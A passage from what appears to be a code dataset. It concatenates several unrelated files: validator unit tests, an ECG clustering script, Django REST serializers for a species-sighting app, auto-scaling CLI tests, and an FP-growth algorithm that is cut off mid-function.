CONTENT_BAD_2 = {
'something': True
}
INPUTS_FLAGS = [
(CONTENT_1, True),
(CONTENT_BAD_1, False),
(CONTENT_BAD_2, False)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_FLAGS)
def test_is_valid_content_flag_sanity(self, current_file, answer):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_content_flag() is answer
SYSTEM_FLAG_1 = {
'system': False,
'content': True,
}
SYSTEM_FLAG_BAD_1 = {
'system': True,
'content': True,
}
INPUTS_SYSTEM_FLAGS = [
(SYSTEM_FLAG_1, True),
(SYSTEM_FLAG_BAD_1, False)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_SYSTEM_FLAGS)
def test_is_valid_system_flag_sanity(self, current_file, answer):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_system_flag() is answer
VALID_CLINAMES_AND_GROUPS = [
("validind", GroupFieldTypes.INCIDENT_FIELD),
("validind", GroupFieldTypes.EVIDENCE_FIELD),
("validind", GroupFieldTypes.INDICATOR_FIELD)
]
@pytest.mark.parametrize("cliname, group", VALID_CLINAMES_AND_GROUPS)
def test_is_cliname_is_builtin_key(self, cliname, group):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname, "group": group}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_cliname_is_builtin_key()
INVALID_CLINAMES_AND_GROUPS = [
("id", GroupFieldTypes.INCIDENT_FIELD),
("id", GroupFieldTypes.EVIDENCE_FIELD),
("id", GroupFieldTypes.INDICATOR_FIELD)
]
@pytest.mark.parametrize("cliname, group", INVALID_CLINAMES_AND_GROUPS)
def test_is_cliname_is_builtin_key_invalid(self, cliname, group):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname, "group": group}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_cliname_is_builtin_key()
VALID_CLINAMES = [
"agoodid",
"anot3erg00did",
]
@pytest.mark.parametrize("cliname", VALID_CLINAMES)
def test_matching_cliname_regex(self, cliname):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_matching_cliname_regex()
INVALID_CLINAMES = [
"invalid cli",
"invalid_cli",
"invalid$$cli",
"לאסליטוב",
]
@pytest.mark.parametrize("cliname", INVALID_CLINAMES)
def test_matching_cliname_regex_invalid(self, cliname):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_matching_cliname_regex()
@pytest.mark.parametrize("cliname, group", VALID_CLINAMES_AND_GROUPS)
def test_is_valid_cliname(self, cliname, group):
current_file = {"cliName": cliname, "group": group}
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_cliname()
@pytest.mark.parametrize("cliname, group", INVALID_CLINAMES_AND_GROUPS)
def test_is_valid_cliname_invalid(self, cliname, group):
current_file = {"cliName": cliname, "group": group}
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_valid_cliname()
data_is_valid_version = [
(-1, True),
(0, False),
(1, False),
]
@pytest.mark.parametrize('version, is_valid', data_is_valid_version)
def test_is_valid_version(self, version, is_valid):
structure = StructureValidator("")
structure.current_file = {"version": version}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_version() == is_valid, f'is_valid_version({version}) returns {not is_valid}.'
IS_FROM_VERSION_CHANGED_NO_OLD = {} # type: dict[any, any]
IS_FROM_VERSION_CHANGED_OLD = {"fromVersion": "5.0.0"}
IS_FROM_VERSION_CHANGED_NEW = {"fromVersion": "5.0.0"}
IS_FROM_VERSION_CHANGED_NO_NEW = {} # type: dict[any, any]
IS_FROM_VERSION_CHANGED_NEW_HIGHER = {"fromVersion": "5.5.0"}
IS_CHANGED_FROM_VERSION_INPUTS = [
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NO_OLD, False),
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NEW, True),
(IS_FROM_VERSION_CHANGED_OLD, IS_FROM_VERSION_CHANGED_NEW, False),
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NO_NEW, False),
(IS_FROM_VERSION_CHANGED_OLD, IS_FROM_VERSION_CHANGED_NEW_HIGHER, True),
]
@pytest.mark.parametrize("current_from_version, old_from_version, answer", IS_CHANGED_FROM_VERSION_INPUTS)
def test_is_changed_from_version(self, current_from_version, old_from_version, answer):
structure = StructureValidator("")
structure.old_file = old_from_version
structure.current_file = current_from_version
validator = IncidentFieldValidator(structure)
assert validator.is_changed_from_version() is answer
structure.quite_bc = True
assert validator.is_changed_from_version() is False
data_required = [
(True, False),
(False, True),
]
@pytest.mark.parametrize('required, is_valid', data_required)
def test_is_valid_required(self, required, is_valid):
structure = StructureValidator("")
structure.current_file = {"required": required}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_required() == is_valid, f'is_valid_required({required})' \
f' returns {not is_valid}.'
data_is_changed_type = [
('shortText', 'shortText', False),
('shortText', 'longText', True),
('number', 'number', False),
('shortText', 'number', True),
('timer', 'timer', False),
('timer', 'number', True),
('timer', 'shortText', True),
('singleSelect', 'singleSelect', False),
('singleSelect', 'shortText', True)
]
@pytest.mark.parametrize('current_type, old_type, is_valid', data_is_changed_type)
def test_is_changed_type(self, current_type, old_type, is_valid):
structure = StructureValidator("")
structure.current_file = {"type": current_type}
structure.old_file = {"type": old_type}
validator = IncidentFieldValidator(structure)
assert validator.is_changed_type() == is_valid, f'is_changed_type({current_type}, {old_type})' \
f' returns {not is_valid}.'
structure.quite_bc = True
assert validator.is_changed_type() is False
TYPES_FROMVERSION = [
('grid', '5.5.0', 'indicatorfield', True),
('grid', '5.0.0', 'indicatorfield', False),
('number', '5.0.0', 'indicatorfield', True),
('grid', '5.0.0', 'incidentfield', True)
]
@pytest.mark.parametrize('field_type, from_version, file_type, is_valid', TYPES_FROMVERSION)
def test_is_valid_grid_fromversion(self, field_type, from_version, file_type, is_valid):
"""
Given
- an invalid indicator-field - the field is of type grid but fromVersion is < 5.5.0.
When
- Running is_valid_indicator_grid_fromversion on it.
Then
- Ensure validate fails on versions < 5.5.0.
"""
structure = StructureValidator("")
structure.file_type = file_type
structure.current_file = {"fromVersion": from_version, "type": field_type}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_indicator_grid_fromversion() == is_valid, \
f'is_valid_grid_fromVersion({field_type}, {from_version} returns {not is_valid}'
|
994,290 | dadc65c3853ffda9e6a2973ab0bebf609e9d9b5c | import numpy as np
import matplotlib.pyplot as plt
import cluster_utils
from cluster_class import cluster_class
from cluster_class_bonus import cluster_class_bonus
from sklearn.cluster import KMeans
import plot
#Load train and test data
train = np.load("../../Data/ECG/train.npy")
test = np.load("../../Data/ECG/test.npy")
#Create train and test arrays
Xtr = train[:,0:-1]
Xte = test[:,0:-1]
Ytr = np.array(map(int, train[:,-1]))
Yte = np.array( map(int, test[:,-1]))
#print "x"
#Add your code below
##########################################################################
# Question 1
##########################################################################
# K = 40
# scores = [0.0] * K
# for k in range(1,K+1):
#
# # KMeans with no. of clusters = k
# cluster = KMeans(n_clusters=k, random_state=10)
# cluster.fit(Xtr)
# scores[k - 1] = cluster_utils.cluster_quality(Xtr, cluster.labels_, k)
#
# plot.line_graph(range(1,K+1), scores, "Cluster Score VS K", "OnePointFour", "Score", "K")
##########################################################################
# Question 2
##########################################################################
# K = 6
#
# cluster = KMeans(n_clusters=K, random_state=10)
# cluster.fit(Xtr)
#
# proportions = cluster_utils.cluster_proportions(cluster.labels_, K)
# plot.bar_graph(proportions, "Cluster Proporstions", "TwoPointTwo")
#
# # Compute cluster means
# means = cluster_utils.cluster_means(Xtr, cluster.labels_, K)
# # Show cluster means
# cluster_utils.show_means(means, proportions).savefig("../Figures/TwoPointFourBarChart.pdf")
##########################################################################
# Question 3
##########################################################################
# K = 40
# scores = [0.0]*K
# for k in range(1,K +1):
# cluster = cluster_class(k)
# cluster.fit(Xtr,Ytr)
# scores[k-1] = cluster.score(Xte,Yte)
#
# plot.line_graph(range(1,K +1), scores, "Prediction Error vs No. of Clusters", "ThreePointFive", "Error", "No. of Clusters")
#
##########################################################################
# Question 4
##########################################################################
K = 40
scores = [0.0]*K
for k in range(1,K +1):
cluster = cluster_class_bonus(k)
cluster.fit(Xtr,Ytr)
scores[k-1] = cluster.score(Xte,Yte)
plot.line_graph(range(1,K +1), scores, "Prediction Error vs No. of Clusters", "ThreePointSeven", "Error", "No. of Clusters")
|
994,291 | 98df772795a941a59978fa9789638d2cd730a709 | from PIL import Image
from StringIO import StringIO
from redmap.common.urls import fqdn
from redmap.common.wms import get_distribution_url
from django.contrib.auth.models import User
from django.core import serializers as django_serializers
from django.core.files.uploadedfile import InMemoryUploadedFile
from redmap.apps.redmapdb.models import Sighting, Species, SpeciesCategory, Region, Person, \
SpeciesAllocation, SpeciesCategory, Region, Person, Accuracy, Count, Sex, \
SizeMethod, WeightMethod, Habitat, Method, Activity, Time, Organisation
from rest_framework import serializers, fields, status
from rest_framework.fields import ImageField
from rest_framework.response import Response
from rest_framework.reverse import reverse
from redmap.apps.restapi.extensions.serializers import PostModelSerializer
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.helpers import ThumbnailError
import base64
import magic
class FilterRelated(serializers.Field):
"""
Helper class for generating links to filtered list views.
"""
def __init__(self, view_name, filter_name, *args, **kwargs):
self.view_name = view_name
self.filter_name = filter_name
super(FilterRelated, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
url = reverse(self.view_name)
return fqdn("{0}?{1}={2}".format(url, self.filter_name, obj.pk))
class ManyHyperlinkedRelatedMethodField(serializers.ManyHyperlinkedRelatedField):
"""
Helper class for generating lists of related links not directly associated
through a *-to-many model fields.
"""
def __init__(self, method_name, *args, **kwargs):
self.method_name = method_name
kwargs['read_only']=True
super(ManyHyperlinkedRelatedMethodField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
values = getattr(self.parent, self.method_name)(obj)
if values:
return map(self.to_native, values)
class ManyIdRelatedMethodField(serializers.ManyRelatedField):
"""
Helper class for generating id lists of related objects not directly associated
through a *-to-many model fields.
"""
def __init__(self, method_name, field_name=None, *args, **kwargs):
self.method_name = method_name
self.field_name = field_name
kwargs['read_only'] = True
super(ManyIdRelatedMethodField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
field_name = self.field_name or field_name
values = getattr(self.parent, self.method_name)(obj)
if values:
return map(lambda v: getattr(v, field_name), values)
class SightingSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
class Meta:
model = Sighting
fields = (
'id', 'url', 'species', 'other_species', 'is_published',
'region', 'update_time', 'category_list'
)
def get_category_list(self, obj):
return obj.categories
class UserSightingSerializer(SightingSerializer):
accuracy = serializers.PrimaryKeyRelatedField()
photo_url = serializers.SerializerMethodField('get_photo_url')
species_id = serializers.SerializerMethodField('get_species_id', )
region_id = serializers.SerializerMethodField('get_region_id')
time = serializers.PrimaryKeyRelatedField()
def get_photo_url(self, obj):
if obj.photo_url == None:
return None
try:
thumb = get_thumbnail(obj.photo_url, '1136x1136', quality=99)
return fqdn(thumb.url)
except (IOError, ThumbnailError):
return None
def get_species_id(self, obj):
if obj.species != None:
return obj.species.pk
return None
def get_region_id(self, obj):
if obj.region != None:
return obj.region.pk
return None
class Meta:
model = Sighting
fields = (
'id', 'url', 'species', 'species_id', 'other_species', 'is_published',
'region', 'region_id', 'update_time', 'category_list', 'latitude', 'longitude', 'accuracy', 'logging_date', 'is_valid_sighting', 'photo_url', 'sighting_date', 'time'
)
class SpeciesSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
picture_url = serializers.SerializerMethodField('get_picture_url')
sightings_url = FilterRelated('sighting-list', 'species')
distribution_url = serializers.SerializerMethodField('get_distribution_url')
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
category_id_list = ManyIdRelatedMethodField(method_name="get_category_list", field_name="id")
region_id_list = ManyIdRelatedMethodField(method_name="get_region_list", field_name="id")
class Meta:
model = Species
fields = (
'id', 'url', 'species_name', 'common_name', 'update_time',
'short_description', 'description', 'image_credit',
'picture_url', 'sightings_url', 'distribution_url',
'category_list', 'category_id_list', 'region_id_list', 'notes'
)
def get_picture_url(self, species):
try:
thumb = get_thumbnail(species.picture_url, '640x640', quality=99)
return fqdn(thumb.url)
except (IOError, ThumbnailError):
return None
def get_distribution_url(self, species):
return get_distribution_url(species.pk, width=200, height=200)
def get_category_list(self, obj):
return SpeciesCategory.objects.filter(speciesincategory__species=obj)
def get_region_list(self, obj):
return Region.objects.filter(speciesallocation__species=obj).distinct()
class CategorySerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
picture_url = serializers.SerializerMethodField('get_picture_url')
def get_picture_url(self, obj):
try:
thumb = get_thumbnail(obj.picture_url, '200x200', quality=99)
return fqdn(thumb.url)
except (IOError, ThumbnailError):
return None
class Meta:
model = SpeciesCategory
fields = ('id', 'url', 'description', 'long_description', 'picture_url')
class RegionSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
sightings_url = FilterRelated('sighting-list', 'region')
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
class Meta:
model = Region
fields = ('id', 'url', 'slug', 'description', 'sightings_url', 'category_list')
def get_category_list(self, region):
return region.categories
class UserSerializer(serializers.ModelSerializer):
id = serializers.Field()
sightings = serializers.ManyPrimaryKeyRelatedField(
read_only=True)
region = serializers.SerializerMethodField('get_region_id')
def get_region_id(self, obj):
profile = obj.get_profile()
if not profile or not profile.region:
return None
return profile.region.id
class Meta:
model = User
fields = (
'id',
'username',
'email',
'first_name',
'last_name',
'sightings',
'region',
)
class PersonSerializer(serializers.ModelSerializer):
id = serializers.Field()
class Meta:
model = Person
fields = (
'id',
'joined_mailing_list_on_signup',
'region',
)
class RegisterSerializer(PostModelSerializer):
join_mailing_list = fields.BooleanField(required=False)
region = fields.ChoiceField(required=True)
def __init__(self, *args, **kwargs):
self.base_fields['region'].choices = tuple([(None, '--None--')] + [(r.description, r.description) for r in Region.objects.all()])
super(RegisterSerializer, self).__init__(*args, **kwargs)
def validate_email(self, data, field_name):
"""
Validate that the email is not already
in use.
"""
existing = User.objects.filter(email__iexact=data['email'])
if existing.exists():
raise fields.ValidationError("A user with that email already exists.")
else:
return data
def to_native(self, obj):
ret = super(RegisterSerializer, self).to_native(obj)
ret['join_mailing_list'] = obj.get_profile().joined_mailing_list_on_signup
ret['region'] = obj.get_profile().region.description
return ret
def save(self, **kwargs):
user = super(RegisterSerializer, self).save(**kwargs)
user.set_password(user.password)
user.save()
profile = user.get_profile()
try:
profile.region = Region.objects.get(description=self.cleaned_data['region'])
except Region.DoesNotExist:
profile.region = None
profile.joined_mailing_list_on_signup = self.cleaned_data['join_mailing_list']
profile.save()
return user
class Meta:
model = User
postonly_fields = ('password',)
fields = (
'username',
'password',
'email',
'first_name',
'last_name',
'join_mailing_list',
'region',
)
class JsonBase64ImageFileField(ImageField):
def field_from_native(self, data, files, field_name, reverted_data):
if 'photo_url' not in files and 'photo_url' in data and 'photo_url_name' in data:
decoded_image_data = base64.b64decode(data.get('photo_url'))
# grab the mime type for the django file handler
content_type_data = StringIO(decoded_image_data[:1024])
content_type = magic.from_buffer(content_type_data.read(1024), mime=True)
# grab file stream data
uploaded_file = StringIO(decoded_image_data)
kwargs = {
'file': uploaded_file,
'field_name': 'photo_url',
'name': data.get('photo_url_name'),
'content_type': content_type,
'size': uploaded_file.len,
'charset': None,
}
uploaded_file = InMemoryUploadedFile(**kwargs)
files['photo_url'] = uploaded_file
data.pop('photo_url')
return super(JsonBase64ImageFileField, self).field_from_native(data, files, field_name, reverted_data)
return super(JsonBase64ImageFileField, self).field_from_native(data, files, field_name, reverted_data)
def to_native(self, value):
return value.name
class CreateSightingSerializer(serializers.ModelSerializer):
id = fields.IntegerField(read_only=True)
pk = fields.IntegerField(read_only=True)
photo_url = JsonBase64ImageFileField(required=False, max_length=512)
class Meta:
model = Sighting
fields = (
'pk',
'id',
'accuracy',
'activity',
'count',
'depth',
'habitat',
'latitude',
'longitude',
'notes',
'other_species',
'photo_caption',
'photo_url',
'sex',
'sighting_date',
'size',
'size_method',
'species',
'time',
'water_temperature',
'weight',
'weight_method',
)
class FacebookSerializer(serializers.Serializer):
id = fields.IntegerField(read_only=True)
access_token = fields.CharField(max_length=255)
auth_token = fields.CharField(max_length=255, read_only=True)
def save(self, **kwargs):
pass
|
994,292 | 6d9600ec2cdc0d3f92729e73d483687479b64edf | def left_rotation(arr):
temp = arr[0]
for i in range(len(arr)-1):
arr[i] = arr[i+1]
arr[len(arr)-1] = temp
def array_rotation(arr,pos):
for i in range(pos):
left_rotation(arr)
print(arr)
def main():
arr = list(map(int,input("Please enter the array: ").split()))
pos = int(input("Please enter the rotation: "))
(array_rotation(arr,pos))
main()
|
994,293 | 6ca26503dd10e2cc288375da8c1000ab0d30c47d | # Copyright 2016 Huawei, Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import mock
from asclient.common import resource as br
from asclient.osc.v1 import instance
from asclient.tests import base
from asclient.v1 import instance_mgr
from asclient.v1 import resource
from osc_lib import utils
class InstanceV1BaseTestCase(base.AutoScalingV1BaseTestCase):
def __init__(self, *args, **kwargs):
super(InstanceV1BaseTestCase, self).__init__(*args, **kwargs)
self._instances = [
{"instance_id": "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T13:52:33Z",
"instance_name": "as-config-TEO_XQF2JJSI"},
{"instance_id": "4699d02c-6f4b-47e3-be79-8b92c665310b",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T13:40:12Z",
"instance_name": "as-config-TEO_LV1JS5P3"},
{"instance_id": "35d9225d-ca47-4d55-bc5d-3858c34610a5",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T08:24:12Z",
"instance_name": "as-config-TEO_2MKT59WO"}, ]
@mock.patch.object(instance_mgr.InstanceManager, "_list")
class TestListAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestListAutoScalingInstance, self).setUp()
self.cmd = instance.ListAutoScalingInstance(self.app, None)
def test_list_as_log(self, mocked):
args = [
"--group", "group-id",
"--lifecycle-status", "INSERVICE",
"--health-status", "NORMAL",
"--offset", "10",
"--limit", "20",
]
verify_args = [
("group", "group-id"),
("lifecycle_status", "INSERVICE"),
("health_status", "NORMAL"),
("offset", 10),
("limit", 20),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mocked.return_value = br.ListWithMeta(instances, "Request-ID")
columns, data = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
url = "/scaling_group_instance/%s/list" % self._group.id
params = {
"life_cycle_status": "INSERVICE",
"health_status": "NORMAL",
"start_number": 10,
"limit": 20,
}
mocked.assert_called_once_with(url, params=params,
key="scaling_group_instances")
self.assertEquals(resource.AutoScalingInstance.list_column_names,
columns)
expected = [('dacd968b-2602-470d-a0e2-92a20c2f2b8b',
'as-config-TEO_XQF2JJSI',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL'),
('4699d02c-6f4b-47e3-be79-8b92c665310b',
'as-config-TEO_LV1JS5P3',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL'),
('35d9225d-ca47-4d55-bc5d-3858c34610a5',
'as-config-TEO_2MKT59WO',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL')]
self.assertEquals(expected, data)
@mock.patch.object(instance_mgr.InstanceManager, "list")
@mock.patch.object(instance_mgr.InstanceManager, "_create")
class TestRemoveAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestRemoveAutoScalingInstance, self).setUp()
self.cmd = instance.RemoveAutoScalingInstance(self.app, None)
def test_remove_as_instance(self, mock_create, mock_list):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "as-config-TEO_2MKT59WO",
"--delete",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"as-config-TEO_2MKT59WO", ]),
("delete", True),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mock_list.return_value = br.ListWithMeta(instances, "Request-ID")
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
mock_list.assert_called_once_with(self._group.id)
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "REMOVE",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
"instance_delete": "yes"
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
def test_soft_remove_as_instance(self, mock_create, mock_list):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "35d9225d-ca47-4d55-bc5d-3858c34610a5",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ]),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mock_list.return_value = br.ListWithMeta(instances, "Request-ID")
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
mock_list.assert_called_once_with(self._group.id)
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "REMOVE",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
@mock.patch.object(utils, "find_resource")
@mock.patch.object(instance_mgr.InstanceManager, "_create")
class TestAddAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestAddAutoScalingInstance, self).setUp()
self.cmd = instance.AddAutoScalingInstance(self.app, None)
def test_add_as_instance(self, mock_create, mock_find_resource):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "35d9225d-ca47-4d55-bc5d-3858c34610a5",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ]),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
mock_find_resource.side_effect = [
br.Resource(None, dict(id=parsed_args.instances[0])),
br.Resource(None, dict(id=parsed_args.instances[1])),
]
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "ADD",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
|
994,294 | 7d46f816d5810fb5fd0f35590bb8702afe531660 | # author: Justin Cui
# date: 2019/10/23
# email: 321923502@qq.com
# 加入数据
def load_dataset():
dataSet = [['bread', 'milk', 'vegetable', 'fruit', 'eggs'],
['noodle', 'beef', 'pork', 'water', 'socks', 'gloves', 'shoes', 'rice'],
['socks', 'gloves'],
['bread', 'milk', 'shoes', 'socks', 'eggs'],
['socks', 'shoes', 'sweater', 'cap', 'milk', 'vegetable', 'gloves'],
['eggs', 'bread', 'milk', 'fish', 'crab', 'shrimp', 'rice']]
return dataSet
# 转化为frozenset使之可以为字典的key便于之后操作
def transfer_to_frozenset(data_set):
frozen_data_set = {}
for elem in data_set:
frozen_data_set[frozenset(elem)] = 1
return frozen_data_set
class TreeNode:
def __init__(self, nodeName, count, nodeParent):
self.nodeName = nodeName
self.count = count
self.nodeParent = nodeParent
self.nextSimilarItem = None
self.children = {}
def increaseC(self, count):
self.count += count
def disp(self, ind=1):
print(' ' * ind, self.nodeName, ' ', self.count)
for child in self.children.values():
child.disp(ind + 1)
def createFPTree(frozenDataSet, minSupport):
headPointTable = {}
for items in frozenDataSet:
for item in items:
headPointTable[item] = headPointTable.get(item, 0) + frozenDataSet[items]
headPointTable = {k: v for k, v in headPointTable.items() if v >= minSupport}
frequentItems = set(headPointTable.keys())
if len(frequentItems) == 0: return None, None
for k in headPointTable:
headPointTable[k] = [headPointTable[k], None]
fptree = TreeNode("null", 1, None)
# scan dataset at the second time, filter out items for each record
for items, count in frozenDataSet.items():
frequentItemsInRecord = {}
for item in items:
if item in frequentItems:
frequentItemsInRecord[item] = headPointTable[item][0]
if len(frequentItemsInRecord) > 0:
orderedFrequentItems = [v[0] for v in
sorted(frequentItemsInRecord.items(), key=lambda v: v[1], reverse=True)]
updateFPTree(fptree, orderedFrequentItems, headPointTable, count)
return fptree, headPointTable
def updateFPTree(fptree, orderedFrequentItems, headPointTable, count):
# handle the first item
if orderedFrequentItems[0] in fptree.children:
fptree.children[orderedFrequentItems[0]].increaseC(count)
else:
fptree.children[orderedFrequentItems[0]] = TreeNode(orderedFrequentItems[0], count, fptree)
# update headPointTable
if headPointTable[orderedFrequentItems[0]][1] == None:
headPointTable[orderedFrequentItems[0]][1] = fptree.children[orderedFrequentItems[0]]
else:
updateHeadPointTable(headPointTable[orderedFrequentItems[0]][1], fptree.children[orderedFrequentItems[0]])
# handle other items except the first item
if (len(orderedFrequentItems) > 1):
updateFPTree(fptree.children[orderedFrequentItems[0]], orderedFrequentItems[1::], headPointTable, count)
def updateHeadPointTable(headPointBeginNode, targetNode):
while (headPointBeginNode.nextSimilarItem != None):
headPointBeginNode = headPointBeginNode.nextSimilarItem
headPointBeginNode.nextSimilarItem = targetNode
def mineFPTree(headPointTable, prefix, frequentPatterns, minSupport):
headPointItems = [v[0] for v in sorted(headPointTable.items(), key=lambda v: v[1][0])]
if (len(headPointItems) == 0): return
for headPointItem in headPointItems:
newPrefix = prefix.copy()
newPrefix.add(headPointItem)
support = headPointTable[headPointItem][0]
frequentPatterns[frozenset(newPrefix)] = support
prefixPath = getPrefixPath(headPointTable, headPointItem)
if (prefixPath != {}):
conditionalFPtree, conditionalHeadPointTable = createFPTree(prefixPath, minSupport)
if conditionalHeadPointTable != None:
mineFPTree(conditionalHeadPointTable, newPrefix, frequentPatterns, minSupport)
def getPrefixPath(headPointTable, headPointItem):
